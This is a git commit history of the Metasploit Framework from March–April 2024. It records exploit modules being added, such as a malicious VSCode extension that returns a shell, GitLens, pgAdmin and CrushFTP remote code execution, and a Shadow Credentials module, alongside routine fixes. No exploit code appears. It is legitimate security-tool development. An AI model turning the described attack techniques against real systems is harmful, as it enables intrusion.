2024-04-19 07:59:33 +03:00
Noam Rathaus
c09ba17b34
Change order so that the second is a yield
2024-04-19 07:57:41 +03:00
Metasploit
211de574aa
automatic module_metadata_base.json update
2024-04-18 20:32:53 -05:00
Jack Heysel
27f5ad8e05
Land #18996 , VSCode Malicious Ext module
...
This PR adds a new exploit that creates a malicious vsix file. a vsix
file is a VS and VSCode extension file. Once installed, the users
computer will call back with a shell. Its not a bug, its a feature!
2024-04-18 18:10:46 -07:00
Metasploit
e9d4f3e99c
automatic module_metadata_base.json update
2024-04-18 19:45:19 -05:00
Jack Heysel
bcaa5359da
Land #18997 , Add GitLens VSCode Extension Exploit
...
GitKraken GitLens before v.14.0.0 allows an untrusted workspace to
execute git commands. A repo may include its own .git folder including a
malicious config file to execute arbitrary code.
2024-04-18 17:19:41 -07:00
adfoster-r7
ba18e63e2d
Land #19109 , Fixes pry-byebug functionality when running credential_collection_spec.rb
2024-04-19 00:55:04 +01:00
remmons-r7
5df1052037
Addressing msftidy issues
...
C:132: 20: [Correctable] Layout/SpaceAroundBlockParameters: Space before first block parameter detected.
C:132: 30: [Correctable] Layout/SpaceAroundBlockParameters: Space after last block parameter detected.
C:133: 5: [Correctable] Layout/IndentationWidth: Use 2 (not 4) spaces for indentation.
C:143: 4: [Correctable] Layout/TrailingEmptyLines: Final newline missing.
2024-04-18 18:34:18 -05:00
remmons-r7
982b6aef0a
Incorporating PAN-OS module peer review suggestions, adding documentation for the module
2024-04-18 18:21:12 -05:00
Zach Goldman
d35748497c
adds ntext parsing to mssql
2024-04-18 16:41:37 -05:00
h00die
a551ef136c
remove default shells on gitlens module
2024-04-18 17:31:02 -04:00
bwatters
c9dfb7e34f
Land #19111 , Use #compatible_payloads in #validate
...
Merge branch 'land-19111' into upstream-master
2024-04-18 15:43:53 -05:00
Spencer McIntyre
854d22e5db
Land #17294 , Add additional reliability metadata
2024-04-18 15:26:34 -04:00
h00die-gr3y
331c961412
update module and documentation with tax country logic
2024-04-18 19:13:19 +00:00
Spencer McIntyre
fd707f4f87
Refresh the cache after adding the new path
2024-04-18 13:25:47 -04:00
Spencer McIntyre
ff295aa5bc
Use #compatible_payloads in #validate
...
This updates the #validate methods to check if the selected payload is
in the modules list of compatible payloads instead of just checking the
platform.
2024-04-18 11:47:12 -04:00
cgranleese-r7
c694522680
Improves test and updates regex handling
2024-04-18 15:45:36 +01:00
adfoster-r7
651f137e94
Routine Gem dependencies update
2024-04-18 15:28:57 +01:00
cgranleese-r7
4186d00720
Fixes pry-byebug when running credential collection tests
2024-04-18 14:30:06 +01:00
remmons-r7
22d3ee5df2
Changing the wording for TARGETURI
2024-04-18 08:25:06 -05:00
remmons-r7
cea9fb66ed
Swap out staged payload for unstaged
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-04-18 08:21:18 -05:00
Metasploit
13a79ab536
Bump version of framework to 6.4.5
2024-04-18 03:37:54 -05:00
adfoster-r7
0e1961d7e9
Add additional reliability metadata
2024-04-17 21:47:27 +01:00
remmons-r7
9741b12d29
Addressing a new issue the linter caught after changes
...
W:117: 5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res.
2024-04-17 15:44:45 -05:00
h00die
01d86b6966
spell jupyter better than the advisory
2024-04-17 16:43:05 -04:00
remmons-r7
7e191c75e7
Addressing msftidy issues
...
Fixes for the following:
W: 80: 5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res_create_file. Did you mean res_check_created?
C: 90: 81: [Correctable] Style/TrailingCommaInArguments: Avoid comma after the last parameter of a method call.
C: 93: 8: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 93: 42: [Correctable] Style/AndOr: Use && instead of and.
C: 93: 46: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 94: 43: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C💯 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:131: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
2024-04-17 15:40:08 -05:00
h00die
c8d9702b37
vscode ipynb review
2024-04-17 16:35:10 -04:00
h00die
ecac5c8fa8
vsix review
2024-04-17 16:13:44 -04:00
h00die
244c901dbe
rancher review
2024-04-17 16:10:24 -04:00
h00die
bae1a2e20f
gitlens review
2024-04-17 16:06:32 -04:00
remmons-r7
275345b68d
Fix single char
2024-04-17 13:54:58 -05:00
remmons-r7
41e19d7759
Draft of CVE-2024-3400 module
2024-04-17 13:52:50 -05:00
Metasploit
607fb09391
automatic module_metadata_base.json update
2024-04-17 09:16:24 -05:00
Spencer McIntyre
727849202d
Land #19087 , chore: remove repetitive words
2024-04-17 09:59:46 -04:00
Metasploit
a03b9e904f
automatic module_metadata_base.json update
2024-04-17 07:54:24 -05:00
adfoster-r7
2116457510
Land #19099 , Add https prefix to module URL references
2024-04-17 13:38:30 +01:00
sjanusz-r7
010f044117
Add https prefix to module URL references
2024-04-17 13:00:41 +01:00
Metasploit
c83a219ae4
automatic module_metadata_base.json update
2024-04-16 16:37:56 -05:00
Jack Heysel
84ea514180
Land #19026 , Add pgadmin exploit CVE-2024-2044
...
This adds an exploit for pgAdmin <= 8.3 which is a path traversal
vulnerability in the session management that allows a Python pickle
object to be loaded and deserialized. This also adds a new Python
deserialization gadget chain to execute the code in a new thread so the
target application doesn't block the HTTP request.
2024-04-16 14:12:41 -07:00
Spencer McIntyre
9cf4372f2b
Clean up some of the module's documentation
2024-04-16 13:36:21 -04:00
cgranleese-r7
3481d4f3bc
Adds test for regex that matches arch and platfrom
2024-04-16 11:31:48 +01:00
bwatters
409f0e45a6
Remove Priv Esc to add it to another module and update it to only run once
2024-04-15 15:44:22 -05:00
cgranleese-r7
3f2e32ef6a
Add arch/platform detection for Postgres
2024-04-15 16:04:57 +01:00
Noam Rathaus
1f90057761
and_return rather than and_yield
2024-04-15 15:07:16 +03:00
Noam Rathaus
ebf94ee7f7
Created spec test for password_spray
2024-04-15 14:30:55 +03:00
adfoster-r7
6bb9a65f8d
Add docs for running and writing unit tests
2024-04-15 12:01:18 +01:00
Noam Rathaus
e9da6673a2
No need for ( )
2024-04-15 13:53:03 +03:00
adfoster-r7
44a02bcffe
Fix crash in exim4_deliver_message_priv_esc
2024-04-15 11:47:06 +01:00
fanqiaojun
6b2bdc893b
chore: remove repetitive words
...
Signed-off-by: fanqiaojun <fanqiaojun@yeah.net >
2024-04-15 11:06:50 +08:00
h00die
bc9fdb3d00
docs
2024-04-14 19:51:23 -04:00
Noam Rathaus
9996dcdb1e
Expose the default_options struct so that it can be sent via RPC and allow better integration (mainly related to default PAYLOAD selection)
2024-04-14 19:49:28 +03:00
Imran E. Dawoodjee
27e46fe8b1
Really make RuboCop happy
2024-04-13 18:29:27 +08:00
Imran E. Dawoodjee
c8b9b321a9
Fix linting
2024-04-13 18:22:20 +08:00
Imran E. Dawoodjee
50a303a6e5
Update references and documentation
2024-04-13 18:21:05 +08:00
Imran E. Dawoodjee
6268235cd3
Add CVE-2022-1373 and CVE-2022-2334 exploit chain
2024-04-13 18:10:45 +08:00
Metasploit
2cf8ea39f9
automatic module_metadata_base.json update
2024-04-12 14:40:38 -05:00
Jack Heysel
1174344b76
Land #18918 , Add CrushFTP Module CVE-2023-43177
...
This exploit module leverages an Improperly Controlled Modification of
Dynamically-Determined Object Attributes vulnerability (CVE-2023-43177)
to achieve unauthenticated remote code execution. This affects CrushFTP
versions prior to 10.5.1.
2024-04-12 12:26:16 -07:00
Jack Heysel
dae9657433
FortiClient EMS Exploit Module
2024-04-12 10:00:07 -07:00
Spencer McIntyre
80a8ffd654
Bump ruby_smb to include changes from #264
2024-04-12 10:54:54 -04:00
Metasploit
9f22d67210
automatic module_metadata_base.json update
2024-04-12 08:48:42 -05:00
Christophe De La Fuente
d36e22fdc6
Land #18936 , mongodb ops manager diagnostic archive info disclosure (cve-2023-0342)
2024-04-12 15:22:18 +02:00
Noam Rathaus
b7e0e83d04
Use yields rather than build an array and sort
2024-04-12 08:05:55 +03:00
Noam Rathaus
c239db573a
Revert "PASSWORD_SPRAY handling"
...
This reverts commit 9b1978c0b6 .
2024-04-12 07:42:55 +03:00
Noam Rathaus
ec19414fef
Pass the PASSWORD_SPRAY value
2024-04-12 07:42:28 +03:00
Imran E. Dawoodjee
4026141809
Change how #get_auth_token returns
2024-04-12 07:14:34 +08:00
Chocapikk
5870ebc6cf
Add suggested changes
2024-04-11 22:48:08 +02:00
Valentin Lobstein
deaf3d7649
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-11 22:15:37 +02:00
Valentin Lobstein
0ba0cd6cfa
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-11 22:15:01 +02:00
Valentin Lobstein
060e5b1d8b
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-11 22:14:51 +02:00
Valentin Lobstein
8ec8afbc45
Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
...
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com >
2024-04-11 22:14:44 +02:00
Noam Rathaus
5625493b4e
PASSWORD_SPRAY passing to credentials
2024-04-11 17:56:24 +03:00
Noam Rathaus
9b1978c0b6
PASSWORD_SPRAY handling
2024-04-11 17:56:12 +03:00
Dean Welch
463200cfb3
Add ldap acceptance tests
2024-04-11 14:40:19 +01:00
Metasploit
2a176e5e15
Bump version of framework to 6.4.4
2024-04-11 03:39:05 -05:00
Metasploit
0df68e8199
automatic module_metadata_base.json update
2024-04-10 11:08:23 -05:00
Spencer McIntyre
aa739cd92d
Land #18962 , rancher audit logs information leak
...
new post module: rancher audit logs sensitive information leak (CVE-2023-22649)
2024-04-10 11:51:54 -04:00
Spencer McIntyre
f579ec7a1a
Clean table printing, document tested version
2024-04-10 11:31:55 -04:00
sjanusz-r7
c576db98b5
Populate SMB shares if they're empty
2024-04-10 14:21:13 +01:00
Metasploit
f8331f4201
automatic module_metadata_base.json update
2024-04-10 06:55:53 -05:00
Spencer McIntyre
76145c3091
Land #19064 , SNMP TCP support
2024-04-10 07:38:35 -04:00
cgranleese-r7
53efed1606
Land #19022 , Add MySQL Arch & Platform detection by query
2024-04-10 12:24:08 +01:00
adfoster-r7
2346bfe1ee
Land #19065 , remove db_create mention
2024-04-09 22:30:47 +01:00
Chocapikk
162fc91193
Add CVE-2024-31819
2024-04-09 22:09:10 +02:00
Metasploit
894d057715
automatic module_metadata_base.json update
2024-04-09 14:40:06 -05:00
Zach Goldman
b8176e13a6
Land #19069 , Update create session default values
2024-04-09 15:24:02 -04:00
Dean Welch
c0c2bf3771
Add ldap acceptance tests
2024-04-09 18:05:40 +01:00
Metasploit
0b610e4255
automatic module_metadata_base.json update
2024-04-09 09:30:32 -05:00
Spencer McIntyre
8f5052f2e7
Land #19051 , Add the Shadow Credentials module
2024-04-09 10:13:08 -04:00
sjanusz-r7
a862b16286
Add MySQL Arch & Platform detection by query
2024-04-09 13:38:07 +01:00
adfoster-r7
8a2b092321
Update create session default values
2024-04-09 12:41:27 +01:00
Imran E. Dawoodjee
1129e443c2
Modularise the Softing login lib file
2024-04-09 16:02:46 +08:00
Noam Rathaus
71538a871f
1. Adjust if end if end to if else end
...
2. Use ::Rex::Socket create's Proto
2024-04-09 08:39:45 +03:00
Ashley Donaldson
29c6e0a1e5
Removed unused function
2024-04-09 07:53:26 +10:00
Spencer McIntyre
397781f2b1
Land #19059 , Fix banner issue in psnuffle
2024-04-08 12:03:06 -04:00
Javier Álvarez
2d819cb029
remove db_create mention
2024-04-08 16:53:17 +02:00
Noam Rathaus
bf489f0b0d
Allow selection of "TCP" for SNMP packets
2024-04-08 17:41:59 +03:00
Noam Rathaus
01d31612c6
Add support for TCP
2024-04-08 17:41:46 +03:00
Metasploit
9982a46538
automatic module_metadata_base.json update
2024-04-08 06:12:17 -05:00
cgranleese-r7
951da5b00c
Land #19056 , Don't close sockets that we're using for sessions
2024-04-08 11:51:31 +01:00
Ashley Donaldson
4557de9a72
Changes from code review
2024-04-08 11:47:09 +10:00
Ashley Donaldson
b1d0918074
Add documentation for module and functions
2024-04-08 11:32:53 +10:00
Ashley Donaldson
1ce29ae21e
Make OpenSSL unit test work on all versions
2024-04-08 11:32:53 +10:00
Ashley Donaldson
5852fcbb78
Error handling and unit tests
2024-04-08 11:32:53 +10:00
Ashley Donaldson
9f5444680f
Some error handling
2024-04-08 11:32:52 +10:00
Ashley Donaldson
049c3ebd1d
Promote constants to top of file
2024-04-08 11:32:52 +10:00
Ashley Donaldson
209d9dfab0
Help user when they've made a typical mistake
2024-04-08 11:32:52 +10:00
Ashley Donaldson
816d834f83
Add dn-binary unit tests
2024-04-08 11:32:51 +10:00
Ashley Donaldson
1b92d3b110
Working writing of certs over ldap
2024-04-08 11:32:51 +10:00
Ashley Donaldson
b6acf708f3
Alias get_ticket to pkinit, since many people will search for that
2024-04-08 11:32:50 +10:00
Ashley Donaldson
c55f8f20a8
Add shadow credentials module
2024-04-08 11:32:50 +10:00
Ashley Donaldson
8800a74b27
Wrap credential struct with nicer API
2024-04-08 11:32:50 +10:00
Ashley Donaldson
e803be425f
Initial work on shadow credentials
2024-04-08 11:32:49 +10:00
h00die
ee891eca3a
spacing
2024-04-07 09:15:50 -04:00
h00die
ed1ae32532
sync engine requirements on vsix
2024-04-07 09:13:59 -04:00
h00die
b83a91a468
review for mongodb ops manager
2024-04-07 05:39:51 -04:00
Noam Rathaus
705cfb5016
Fix empty banner (never set) issue
2024-04-05 19:24:19 +03:00
Metasploit
e184f5e708
automatic module_metadata_base.json update
2024-04-05 09:39:59 -05:00
Christophe De La Fuente
34f0afa298
Land #19044 , Gibbon Online School Platform Authenticated RCE [CVE-2024-24725]
2024-04-05 16:20:11 +02:00
Metasploit
a0d72680e0
automatic module_metadata_base.json update
2024-04-05 08:42:50 -05:00
Dean Welch
87b84b00fb
Don't close sockets that we're using for sessions
2024-04-05 14:33:30 +01:00
adfoster-r7
674249687f
Land #19020 , consolidate session tests
2024-04-05 14:17:40 +01:00
Dean Welch
434e85261b
Add postgres client specs
2024-04-05 13:10:15 +01:00
Dean Welch
25a65c0ed7
Consolidate and simplify session tests
2024-04-05 13:10:15 +01:00
adfoster-r7
a3bba29fb6
Land #19045 , add initial mssql module acceptance tests
2024-04-05 13:01:41 +01:00
adfoster-r7
9e670d2f52
Land #19052 , Update user agent strings for April 24
2024-04-04 23:43:10 +01:00
Jack Heysel
8968222cf0
Rubocop, when will I learn
2024-04-04 13:41:08 -07:00
Jack Heysel
7f62dd2143
Responded to comments
2024-04-04 13:39:22 -07:00
Zach Goldman
61f9e36443
add mssql acceptance tests
2024-04-04 12:58:43 -05:00
h00die-gr3y
978fb46e52
added documentation
2024-04-04 17:35:12 +00:00
h00die-gr3y
8afbbc1553
third release module based on smcintyre-r7 comments
2024-04-04 17:14:32 +00:00
Metasploit
a6ffb5fae8
Bump version of framework to 6.4.3
2024-04-04 03:35:15 -05:00
Ashley Donaldson
da5d8f3471
Update user agent strings for April 24
2024-04-04 14:29:14 +11:00
Jack Heysel
9a88ca33e0
second commit with a couple TODOs
2024-04-03 19:36:39 -07:00
Jack Heysel
b55c5f45c0
Initial commit
2024-04-03 17:25:45 -07:00
Jack Heysel
531e7baa02
Add reminder todo
2024-04-03 17:08:09 -07:00
Metasploit
47d8ba5c20
automatic module_metadata_base.json update
2024-04-03 08:44:02 -05:00
adfoster-r7
926e2fa204
Land #19033 , lint modules/exploits/linux/smtp/haraka.py
2024-04-03 14:19:18 +01:00
adfoster-r7
bd99cfd701
Land #19003 , add Zig formatting support to msfvenom and payload generation
2024-04-02 23:17:45 +01:00
Jack Heysel
059cfd9a48
Reduced conf folder txt files
2024-04-02 11:40:00 -07:00
Jack Heysel
03fced404a
Apache Solr Backup Restore RCE
...
Writing file to disk working
working on linux
wip authentcaiton
Consolodated conf folders into one
Renamed conf1 to conf in msf data dir
Randomize the configuration name
Docs plus finishing touches
rubocop
Updated exploit file location
Removed unused external dir
Reduced conf folder
2024-04-02 11:33:52 -07:00
h00die-gr3y
8aa6d19e7d
second release module
2024-04-01 20:21:37 +00:00
Metasploit
6a32f81210
automatic module_metadata_base.json update
2024-04-01 10:47:03 -05:00
Spencer McIntyre
3af68ef51a
Land #19032 , Fix bad module indentation
...
The wp_downloadmanager_upload module has bad indentation
2024-04-01 11:30:59 -04:00
Metasploit
44ba1b5082
automatic module_metadata_base.json update
2024-04-01 10:07:32 -05:00
Spencer McIntyre
7e132758d6
Land #19031 , Extra ',' is causing ruby issues
2024-04-01 10:52:14 -04:00
h00die-gr3y
d8942b27a2
first release module
2024-04-01 14:49:10 +00:00
Metasploit
33ca728e38
automatic module_metadata_base.json update
2024-04-01 09:48:16 -05:00
Spencer McIntyre
e34f936862
Land #19030 , Module indentation was wrong
2024-04-01 10:27:12 -04:00
Noam Rathaus
9cc294dbaf
1. Remove unused modules
...
2. Prettify code
2024-03-30 17:56:49 +03:00
Noam Rathaus
c8c7e74cba
Bad indentation
2024-03-30 17:06:25 +03:00
Noam Rathaus
609d356083
Extra ',' is causing ruby issues
2024-03-30 17:02:13 +03:00
Noam Rathaus
e75043f00e
Module indentation was wrong
2024-03-30 16:50:48 +03:00
Metasploit
4ecd106681
automatic module_metadata_base.json update
2024-03-29 15:46:34 -05:00
bwatters
3dc638909f
Land #18906 , Add template data files for ESC2 and ESC3
...
Merge branch 'land-18906' into upstream-master
2024-03-29 15:29:52 -05:00
Spencer McIntyre
43d1bd9a2e
Add docs and fix CSRF token for v7.0
2024-03-29 14:05:39 -04:00
Spencer McIntyre
c7976d204c
Add module metadata and clean things up
2024-03-29 10:40:43 -04:00
Spencer McIntyre
e5635c4bfd
Add source code for Python deserialization gadgets
2024-03-29 09:33:47 -04:00
Spencer McIntyre
fb073cf21a
Bump ruby_smb to pull in submitted changes
2024-03-29 09:33:47 -04:00
Spencer McIntyre
2292da9164
Add the UNC loading technique too
2024-03-29 09:33:47 -04:00
Spencer McIntyre
9dcd0e461f
Delete the file using the file manager too
2024-03-29 09:33:47 -04:00
Spencer McIntyre
8fa7aa6407
Initial exploit for CVE-2024-2044
2024-03-29 09:33:44 -04:00
Christophe De La Fuente
e6e13e7b45
Fixes from code review
2024-03-29 12:18:16 +01:00
ArchiMoebius
28ad74c663
chore(bump): rex-text
2024-03-28 23:53:59 +00:00
Metasploit
876398da31
automatic module_metadata_base.json update
2024-03-28 15:47:57 -05:00
Jack Heysel
31cf0e2633
Land #18764 , Add unauth Jenkins file read module
...
This PR adds a new module to exploit CVE-2024-23897, an unauth arbitrary
(first 2 lines) file read on Jenkins.
2024-03-28 13:29:39 -07:00
jheysel-r7
155181fd92
Apply suggestions to fix the last code review
2024-03-28 15:54:58 -04:00
jheysel-r7
14938a2d77
Apply suggestions from code review
2024-03-28 14:41:25 -04:00
Jack Heysel
0cd2bc5010
Land #18935 , Fix LDAP auto auth
...
This PR fixes a common user mistake when authenticating with LDAP
modules. Now users can specify either the USERNAME (user) and DOMAIN
(domain.local) datastore options or the original format of just the
USERNAME in the UPN format (user@domain.local ). This updates the LDAP
library.
2024-03-28 11:19:55 -07:00
h00die-gr3y
9f50f12e6e
update addressing cdelafuente-r7 comments
2024-03-28 18:16:11 +00:00
Metasploit
0e273bfc76
automatic module_metadata_base.json update
2024-03-28 12:56:24 -05:00
adfoster-r7
20af1a4259
Land #19007 , don't run check modules in the background
2024-03-28 17:35:23 +00:00
Jack Heysel
d7f3fd8cc0
Land #18915 , Add Watchguard RCE CVE-2022-26318
...
This PR adds a module for a buffer overflow at the administration
interface of WatchGuard Firebox and XTM appliances. The appliances are
built from a cherrypy python backend sending XML-RPC requests to a C
binary called wgagent using pre-authentication endpoint /agent/login.
This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before
12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. Successful
exploitation results in remote code execution as user nobody.
2024-03-28 10:24:32 -07:00
adfoster-r7
0580068570
Land #19014 , add MySQL session type acceptance tests
2024-03-28 17:07:58 +00:00
adfoster-r7
c0d66fd3a9
Land #18933 , update SQL sessions to correctly manage history
2024-03-28 17:02:05 +00:00
Metasploit
37d3c88731
automatic module_metadata_base.json update
2024-03-28 11:58:32 -05:00
cgranleese-r7
f9b20d89f3
Add MySQL session type acceptance tests
2024-03-28 16:39:27 +00:00
adfoster-r7
d6ecd9db70
Land #19021 , update admin/mysql/mysql_enum for newer versions of mysql
2024-03-28 16:34:49 +00:00
Metasploit
8d3bfc05ef
Bump version of framework to 6.4.2
2024-03-28 07:29:54 -05:00
adfoster-r7
69660c329d
Land #19017 , add better logging for failed mssql logins
2024-03-28 12:21:28 +00:00
adfoster-r7
00b9ae32f3
Land #19016 , add support for guid column type in mssql and improve error logging
2024-03-28 12:18:58 +00:00
cgranleese-r7
c5e98d954b
Updates to work with newer versions of MySQL
2024-03-28 12:11:35 +00:00
adfoster-r7
c79540a93a
Land #18982 , Add RPC methods for interactive session read and write
2024-03-28 11:32:03 +00:00
Egor Kalinichev
623307a119
Implement new interactive_read and interactive_write RPC calls for Session API to extend support of meterpreter-style session interaction via RPC to new session types.
2024-03-28 11:42:04 +01:00
h00die-gr3y
6e6f1beb92
update addressing jheysel-r7 comments
2024-03-28 08:43:08 +00:00
Zach Goldman
b5d96de192
add better logging for failed logins
2024-03-27 09:54:38 -05:00
Zach Goldman
9af16b2439
add support for guid column type in mssql
2024-03-27 09:50:06 -05:00
dwelch-r7
47fc61f65d
Land #19015 , Allow static DNS hostnames ending in a . to be queried
2024-03-27 13:49:49 +00:00
ekalinichev-r7
c4995100bf
Land #18925 : Update RPC API to include Auxiliary and Exploit modules in session.compatible_modules response
2024-03-27 11:46:53 +01:00
Metasploit
86544049bb
automatic module_metadata_base.json update
2024-03-26 17:02:59 -05:00
Jack Heysel
abb2eb7ffd
Land #18891 , Add RCE module for wp bricks builder
...
This PR adds the wp_bricks_builder_rce exploit module that targets a
known vulnerability in the WordPress Bricks Builder Theme, versions
prior to 1.9.6.
2024-03-26 14:46:35 -07:00
Balgogan
b9b4a624d9
Fix typos
2024-03-26 21:05:35 +01:00
Valentin Lobstein
abc39e86f9
Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-03-26 20:40:04 +01:00
Valentin Lobstein
672036f53a
Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-03-26 20:39:33 +01:00
Valentin Lobstein
8a1290c8a6
Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-03-26 20:39:23 +01:00
Valentin Lobstein
85e27b0bc3
Update modules/exploits/multi/http/wp_bricks_builder_rce.rb
...
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com >
2024-03-26 20:39:04 +01:00
h00die-gr3y
4546fd1600
small updates documentation
2024-03-26 19:34:12 +00:00
Metasploit
7b172f3675
automatic module_metadata_base.json update
2024-03-26 13:07:11 -05:00
bwatters
e58c6b9df2
Land #18721 , SharePoint Unauth RCE Exploit Chain (CVE-2023-29357 & CVE-2023-24955)
...
Merge branch 'land-18721' into upstream-master
2024-03-26 12:42:22 -05:00
Spencer McIntyre
8bb690fa01
Remove any trailing dots from static names
...
This allows them to be queried
2024-03-26 08:40:24 -04:00
adfoster-r7
5a77f76ec9
Land #19006 , Fixes WMAP plugin loading failures
2024-03-26 11:28:49 +00:00
sjanusz-r7
e2814d6ad5
Align history manager to IRBs multiple backend library approach
2024-03-26 11:16:37 +00:00
sjanusz-r7
70e27f8112
Passing history manager tests
2024-03-26 10:06:50 +00:00
sjanusz-r7
873d3500ff
SQL sessions have correct history manager support
2024-03-26 10:06:50 +00:00
sjanusz-r7
abb861c80a
Add interactive query log files
2024-03-26 10:06:50 +00:00
adfoster-r7
30093ea0ae
Land #19012 , Fix/dns/dot suffixed names
2024-03-25 21:47:40 +00:00
Metasploit
919e6d4651
automatic module_metadata_base.json update
2024-03-25 15:41:44 -05:00
bwatters
e775c7c20a
Land #18967 , Artica Proxy unauthenticated RCE [CVE-2024-2054]
...
Merge branch 'land-18967' into upstream-master
2024-03-25 15:25:27 -05:00
Spencer McIntyre
6d1d20cdbe
Bump rex-socket to include changes from #66
2024-03-25 14:46:14 -04:00
Spencer McIntyre
4c835545a3
Ignore the hosts file if it can't be loaded
2024-03-25 14:44:49 -04:00
Metasploit
7a3d031b15
automatic module_metadata_base.json update
2024-03-25 12:46:41 -05:00
adfoster-r7
c03e4c4ab0
Land #19009 , add missing Platform to osx/local/persistence module
2024-03-25 17:31:15 +00:00
sjanusz-r7
38c5c6bb11
Add missing Platform to osx/local/persistence module
2024-03-25 16:00:25 +00:00
sjanusz-r7
88585bab40
Suggest all compatible modules for session in RPC
2024-03-25 15:55:23 +00:00
Dean Welch
f132bdbe30
Enforce single module stance
2024-03-25 11:53:23 +00:00
Metasploit
0e3e7b594e
automatic module_metadata_base.json update
2024-03-25 06:44:56 -05:00
Christophe De La Fuente
57a45a0b55
CrushFTP exploit module CVE-2023-43177 and documentation
2024-03-25 12:41:24 +01:00
cgranleese-r7
9b4114eda0
Land #18961 , Adds session documentation
2024-03-25 11:23:05 +00:00
adfoster-r7
decba4350e
Additional changes to documentation
2024-03-25 10:53:08 +00:00
cgranleese-r7
d3251043e5
Fixes WMAP plugin loading failures
2024-03-25 09:55:38 +00:00
h00die-gr3y
d240d17113
added documentation
2024-03-24 10:30:36 +00:00
h00die-gr3y
0262efee8b
first release module
2024-03-24 09:32:56 +00:00
ArchiMoebius
533780bde9
feat(ziglang): add buffer/comment support
2024-03-23 14:53:54 +00:00
h00die
3da170a43c
smcintyre-r7 recommendation for better payload handling
2024-03-22 17:04:06 -04:00
h00die
4f6903481c
remove screenshot functionality for time being
2024-03-22 16:37:22 -04:00
h00die
f6b65993ac
ipynb vscode exploit
2024-03-22 16:26:03 -04:00
h00die
eb26b0adcc
gitlens exploit module
2024-03-22 16:22:39 -04:00
h00die
83944f7070
vsix deployment module
2024-03-22 16:14:51 -04:00
Metasploit
685a2e9df6
automatic module_metadata_base.json update
2024-03-22 12:49:46 -05:00
dwelch-r7
a674310c22
Land #18992 , Fix postgres version logging
2024-03-22 17:33:43 +00:00
adfoster-r7
acf9745200
Fix postgres version logging
2024-03-22 16:50:01 +00:00
h00die
0cd174c533
rancher docs update
2024-03-21 17:40:19 -04:00
h00die
f9de96cc95
mongodb ops manager diagnostic archive info disclosure
2024-03-21 17:36:15 -04:00
h00die
f617ea6e96
Update modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb
...
Co-authored-by: Brendan <bwatters@rapid7.com >
2024-03-21 16:39:49 -04:00
h00die-gr3y
f217312ad1
module and documentation updates based on review comments (bwatters-r7/cgranleese-r7)
2024-03-21 16:13:55 +00:00
Zach Goldman
2c307f1bb3
Adds session documentation
...
add more console output, add to pentesting side
split out session, help, query, query_interactive sections
add multiline examples
update mysql, smb
2024-03-21 09:52:10 -05:00
Metasploit
11c24ecdda
automatic module_metadata_base.json update
2024-03-21 08:20:16 -05:00
dwelch-r7
3de8b02287
Land #18985 , Fixes store_valid_credential conditional logic
2024-03-21 12:56:23 +00:00
cgranleese-r7
d750ea19eb
Fixes store_valid_credential conditional logic for unix/webapp/wp_admin_shell_upload module
2024-03-21 12:22:11 +00:00
Metasploit
3af4358281
Bump version of framework to 6.4.1
2024-03-21 03:37:19 -05:00
adfoster-r7
b461f08ba3
Land #18980 , improves basic shell help command
2024-03-20 21:27:12 +00:00
Metasploit
a0d162bc9f
automatic module_metadata_base.json update
2024-03-20 15:10:21 -05:00
Jack Heysel
2b90d33aef
Land #18618 , Add OpenNMS privesc and auth RCE
...
This module exploits built-in functionality in OpenNMS Horizon in order
to execute arbitrary commands as the opennms user. For versions 32.0.2
and higher, this module requires valid credentials for a user with
ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST.
For versions 32.0.1 and lower, credentials are required for a user with
ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges.
2024-03-20 12:54:16 -07:00
Zach Goldman
c16b8e6e64
adds help command to basic shells
2024-03-20 14:18:36 -05:00
adfoster-r7
fd8354340b
Land #18973 , improves the help menu for sessions
2024-03-20 19:11:18 +00:00
adfoster-r7
298e03b1cd
Land #18885 , update the sessions command to be consistent
2024-03-20 18:49:33 +00:00
Jack Heysel
6cd7f44197
rubocop
2024-03-20 11:39:19 -07:00
Jack Heysel
149dc15b21
Add check to see if notifications are enabled
2024-03-20 11:33:15 -07:00
Zach Goldman
2c9ade955e
make session query/shares help menu more explicit
2024-03-20 13:18:10 -05:00
Metasploit
1f1e6b2dbb
automatic module_metadata_base.json update
2024-03-20 12:55:38 -05:00
Spencer McIntyre
321e0730e0
Land #18957 , Bump Metasploit version to 6.4.0
2024-03-20 13:24:44 -04:00
Zach Goldman
1216bf1904
Land #18979 , Remove empty () when no DB selected for sql session prompts
2024-03-20 12:52:02 -04:00
cgranleese-r7
2a63d0d1f0
Land #18978 , Add user affordance for scanner modules that can create a new session
2024-03-20 16:50:29 +00:00
Dean Welch
ff5811e96b
Remove empty () when no DB selected for sql session prompts
2024-03-20 16:13:48 +00:00
adfoster-r7
d4cb976aa7
